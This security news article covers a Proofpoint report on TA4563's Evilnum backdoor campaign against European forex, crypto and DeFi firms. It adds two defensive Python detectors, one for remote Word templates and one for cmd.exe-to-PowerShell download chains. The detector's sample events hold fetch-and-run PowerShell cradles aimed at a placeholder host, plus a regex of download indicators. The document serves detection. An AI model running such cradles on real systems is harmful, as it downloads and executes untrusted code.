Financial and investment entities are being targeted in an ongoing campaign by attackers deploying Evilnum, a known backdoor that can be used to steal data or load additional payloads.
The threat actor behind the activity, which Proofpoint researchers track as TA4563, specifically targeted European companies with operations supporting foreign exchange and cryptocurrency trading, as well as organizations in the decentralized finance (DeFi) industry. The campaign, which overlaps in part with the activity of the known Evilnum APT (also tracked as DeathStalker) reported by Zscaler in June, was first observed in late 2021 and is ongoing.
“Identified campaigns delivered an updated version of the Evilnum backdoor using a varied mix of ISO, Microsoft Word, and Shortcut (LNK) files in late 2021 and early 2022, likely as a method of testing the effectiveness of the methods of delivery,” said Bryan Campbell, Pim Trouerbach and Selena Larson, researchers at Proofpoint, in an analysis published Thursday. “This malware can be used for reconnaissance, data theft and to deploy additional payloads.”
When the campaign was first observed in December, attackers sent targeted emails purporting to relate to registration for financial trading platforms. The messages used a remote document template that attempted to communicate with attacker domains which would install the LNK loader components. Those loader components in turn started the download of the Evilnum backdoor.
The campaign has evolved slightly over time. In early 2022, researchers observed the group sending emails containing OneDrive URLs that led to ISO and .LNK files. These emails used decoys themed around financial documentation, including one reminding recipients to submit proof of identity and address. In a more recent campaign in mid-2022, the decoys asked recipients to send ‘proof of ownership’, but the documents attached to the emails in fact led them to what researchers believe to be an actor-controlled domain.
“As the threat actor maintained consistent targeting and victimology, the methodology changed again,” the researchers said. “During mid-2022 campaigns, TA4563 delivered Microsoft Word documents in an attempt to load a remote template.”
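Both the December lures and the mid-2022 Word documents described above rely on a remote template: the document itself carries no payload, only a relationship that tells Word to fetch its template from an attacker domain when the file opens. A defender can triage attachments for that relationship offline. The following is an added example written for this article, not Proofpoint's code and not a sample from the campaign; the .docx files it inspects are constructed in memory, and the URLs and paths in them are placeholders.

```python
"""Flag Word documents that pull their template from the network.

Added example (not Proofpoint's or the article's code). A .docx is a zip of XML
parts; Word records an attached template as a Relationship of type
attachedTemplate in word/_rels/settings.xml.rels. Benign documents point that
relationship at a local file (for example Normal.dotm, as a file: URL), while a
remote-template lure points it at an http(s) URL or a UNC share, so the check
below keys on the target's scheme, not merely on TargetMode="External".
The sample documents are constructed in memory and are not real lures.
"""
import io
import zipfile
import xml.etree.ElementTree as ET
from typing import List, Optional
from urllib.parse import urlparse

RELS_NS = "http://schemas.openxmlformats.org/package/2006/relationships"
ATTACHED_TEMPLATE = ("http://schemas.openxmlformats.org/officeDocument/2006/"
                     "relationships/attachedTemplate")
REMOTE_SCHEMES = ("http", "https", "ftp")


def remote_templates(docx_bytes: bytes) -> List[str]:
    """Return every network-hosted attachedTemplate target in the document."""
    hits = []
    with zipfile.ZipFile(io.BytesIO(docx_bytes)) as zf:
        # settings.xml.rels is the usual home of the relationship; scanning every
        # .rels part costs little and catches a template attached from elsewhere.
        for name in zf.namelist():
            if not name.lower().endswith(".rels"):
                continue
            root = ET.fromstring(zf.read(name))
            for rel in root.iter("{%s}Relationship" % RELS_NS):
                if rel.get("Type") != ATTACHED_TEMPLATE:
                    continue
                target = rel.get("Target", "")
                scheme = urlparse(target).scheme.lower()
                is_unc = target.startswith("\\\\")
                if rel.get("TargetMode") == "External" and (scheme in REMOTE_SCHEMES or is_unc):
                    hits.append(target)
    return hits


def build_docx(template_target: Optional[str]) -> bytes:
    """Build a minimal .docx; only the parts the check reads are meaningful (constructed sample)."""
    buf = io.BytesIO()
    with zipfile.ZipFile(buf, "w", zipfile.ZIP_DEFLATED) as zf:
        zf.writestr("[Content_Types].xml", "<Types/>")
        zf.writestr("_rels/.rels", '<Relationships xmlns="%s"/>' % RELS_NS)
        zf.writestr("word/document.xml", "<document/>")
        zf.writestr("word/settings.xml", "<settings/>")
        if template_target is not None:
            zf.writestr(
                "word/_rels/settings.xml.rels",
                '<Relationships xmlns="%s"><Relationship Id="rId1" Type="%s" '
                'Target="%s" TargetMode="External"/></Relationships>'
                % (RELS_NS, ATTACHED_TEMPLATE, template_target),
            )
    return buf.getvalue()


# Constructed samples: placeholder hosts and paths, not indicators from the campaign.
SAMPLES = {
    "no template": build_docx(None),
    "local Normal.dotm": build_docx(
        "file:///C:/Users/user/AppData/Roaming/Microsoft/Templates/Normal.dotm"),
    "remote template": build_docx("https://example.invalid/tpl.dotm"),
    "UNC template": build_docx("\\\\203.0.113.7\\share\\tpl.dotm"),
}

if __name__ == "__main__":
    for label, doc in SAMPLES.items():
        print("%-18s %s" % (label, remote_templates(doc) or "clean"))
```

The scheme check matters in practice: Word writes the attached template for an ordinary document as an External relationship pointing at a local file: URL, so a rule that fires on TargetMode="External" alone would flag most legitimate documents.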
From there, the loader ran PowerShell (via cmd.exe) to download two different payloads. The first was responsible for running two PowerShell scripts: one that decrypted a PNG and followed logic to restart the infection chain, and one that sent screenshots to a command-and-control (C2) server. The second contained two encrypted blobs used by an executable that decrypted a TMP file to load shellcode, which ultimately produced a decrypted PE file.
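The cmd.exe-to-PowerShell download step is the most visible part of this chain in endpoint telemetry, because both processes and their command lines are logged by default on most EDR and Sysmon deployments. The following added example, which is not Proofpoint's detection content, reconstructs process ancestry from process-creation records and flags PowerShell instances launched beneath cmd.exe whose command line carries a download or decode indicator. The events are constructed for illustration; the specific parent processes (Explorer for a double-clicked LNK, Word for a document) and command lines are assumptions, not observations from the campaign.

```python
"""Reconstruct process ancestry and flag cmd.exe -> PowerShell download cradles.

Added example, not Proofpoint's detection content. EVENTS holds constructed
process-creation records (Sysmon event 1 style fields: pid, ppid, image,
command line), not telemetry from a real Evilnum infection; the parent
processes and command lines of the malicious chains are assumptions.
"""
import re
from typing import Dict, List

# Indicators that a PowerShell command line fetches or decodes a payload.
DOWNLOAD_CRADLE = re.compile(
    r"Net\.WebClient|Download(?:String|File|Data)\(|Invoke-WebRequest|\biwr\b|"
    r"Invoke-RestMethod|\birm\b|Start-BitsTransfer|-enc(?:odedcommand)?\b|FromBase64String",
    re.IGNORECASE,
)
SHELLS = ("powershell.exe", "pwsh.exe")
PS_IMAGE = r"C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe"

EVENTS = [  # constructed sample, placeholder hosts
    {"pid": 400, "ppid": 1, "image": r"C:\Windows\explorer.exe", "cmdline": "explorer.exe"},
    # Chain A: a Shortcut (LNK) opened from Explorer runs cmd.exe, which runs a cradle.
    {"pid": 1300, "ppid": 400, "image": r"C:\Windows\System32\cmd.exe",
     "cmdline": 'cmd.exe /c powershell -w hidden -c "IEX (New-Object Net.WebClient).DownloadString(\'http://example.invalid/s\')"'},
    {"pid": 1310, "ppid": 1300, "image": PS_IMAGE,
     "cmdline": 'powershell -w hidden -c "IEX (New-Object Net.WebClient).DownloadString(\'http://example.invalid/s\')"'},
    # Chain B: Word (for instance after a remote template loads) -> cmd.exe -> encoded PowerShell.
    {"pid": 1500, "ppid": 400, "image": r"C:\Program Files\Microsoft Office\root\Office16\WINWORD.EXE",
     "cmdline": "WINWORD.EXE /n lure.docx"},
    {"pid": 1510, "ppid": 1500, "image": r"C:\Windows\System32\cmd.exe",
     "cmdline": "cmd.exe /c powershell -nop -enc SQBFAFgAIACo"},
    {"pid": 1520, "ppid": 1510, "image": PS_IMAGE, "cmdline": "powershell -nop -enc SQBFAFgAIACo"},
    # Benign: an admin console running a cmdlet with no download or decode indicator.
    {"pid": 2000, "ppid": 400, "image": r"C:\Windows\System32\cmd.exe", "cmdline": "cmd.exe"},
    {"pid": 2010, "ppid": 2000, "image": PS_IMAGE, "cmdline": "powershell Get-Service -Name Spooler"},
    # Out of scope for this rule: a download cradle with no cmd.exe ancestor.
    {"pid": 3000, "ppid": 400, "image": PS_IMAGE,
     "cmdline": "powershell Invoke-WebRequest https://intranet.example/update.ps1"},
]


def image_name(path: str) -> str:
    """Lower-cased file name of an image path."""
    return path.rsplit("\\", 1)[-1].lower()


def ancestry(by_pid: Dict[int, dict], pid: int, max_depth: int = 8) -> List[str]:
    """Walk parent links from pid upward; returns image names, root first."""
    chain, seen = [], set()
    while pid in by_pid and pid not in seen and len(chain) < max_depth:
        seen.add(pid)  # guard against PID reuse producing a cycle
        chain.append(image_name(by_pid[pid]["image"]))
        pid = by_pid[pid]["ppid"]
    return chain[::-1]


def flag_cmd_powershell_cradles(events: List[dict]) -> List[dict]:
    """Return PowerShell processes spawned beneath cmd.exe whose command line
    carries a download or decode indicator, with their reconstructed chain."""
    by_pid = {e["pid"]: e for e in events}
    findings = []
    for ev in events:
        if image_name(ev["image"]) not in SHELLS:
            continue
        chain = ancestry(by_pid, ev["pid"])
        if "cmd.exe" not in chain[:-1]:  # look at the ancestors, not the process itself
            continue
        m = DOWNLOAD_CRADLE.search(ev["cmdline"])
        if not m:
            continue
        findings.append({"pid": ev["pid"], "chain": " -> ".join(chain),
                         "indicator": m.group(0), "cmdline": ev["cmdline"]})
    return findings


if __name__ == "__main__":
    for f in flag_cmd_powershell_cradles(EVENTS):
        print("pid %d  %s  [%s]" % (f["pid"], f["chain"], f["indicator"]))
```

The rule is deliberately scoped to the chain the article describes: the last sample event, a cradle launched directly from Explorer, is left alone so that the cmd.exe condition does the work, and the benign admin console shows why the command-line indicator is needed on top of the parent check. Production rules would add the encoded-command decoding and the process-creation source fields the telemetry platform provides.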
“Several applications are executed depending on the antivirus software – Avast, AVG or Windows Defender – found on the host,” the researchers said. “The malware will try to call multiple executables likely already on the host machine (e.g. TechToolkit.exe and nvapiu.exe). The malware execution chain will change to better evade detection from the identified antivirus engine.”
Evilnum can be used for reconnaissance, data theft, and loading follow-on payloads. Although the researchers have not observed any follow-on payloads deployed in these campaigns, they point to third-party reports showing Evilnum malware being used to distribute tools available through the Golden Chickens malware-as-a-service offering.
“TA4563 has adjusted its attempts to compromise victims using various delivery methods. While Proofpoint has observed this activity and provided detection updates to thwart it, it should be noted that a persistent adversary will continue to adjust its posture in its attempts to compromise,” the researchers said.